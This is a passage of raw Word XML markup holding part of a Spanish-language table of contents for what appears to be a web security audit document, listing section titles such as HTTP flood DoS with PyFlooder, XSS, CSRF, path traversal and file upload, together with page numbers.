                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Explicación Flood HTTP -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034191 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>263</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="4A4F07AF" w14:textId="7AB9D84F" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="880"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034192" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>-</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Ataque de DoS HTTP Flood con PyFlooder:</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034192 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>264</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="54E69E7D" w14:textId="4F7C00D1" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="880"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034193" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>-</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Ataque DoS HTTP Flood con  Golang-httpflood:</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034193 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>266</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="2E5AFA0D" w14:textId="7D53DC9B" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC1"/>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034194" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>9.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Informe de auditoria</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034194 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>269</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="733799FD" w14:textId="0F9EE7A8" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034195" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>a)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Informe ejecutivo.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034195 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>269</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="371B73E0" w14:textId="02076E3A" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034196" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>b)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Informe técnico.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034196 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>273</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="333920AF" w14:textId="7A505A27" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034197" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>XSS -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034197 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>273</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="31A797EA" w14:textId="6AA8FE40" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034198" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Elevación de privilegios y Manipulación de cookies -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034198 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>275</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="057BCAA5" w14:textId="7660D5BF" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034199" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>XSRF/CSFR-&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034199 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>277</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="7919DF39" w14:textId="274508F7" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034200" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>XSSI-&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034200 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>279</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="70959241" w14:textId="538D35D7" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034201" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Path Transversal-&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034201 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>280</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="3518ADE4" w14:textId="181F81F4" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034202" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>DoS-&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034202 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>285</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="0ED3DB6C" w14:textId="0E905524" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034203" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>File Upload -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034203 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>286</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="70957EAC" w14:textId="3ECA96D7" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034204" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Otros Ataques:</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
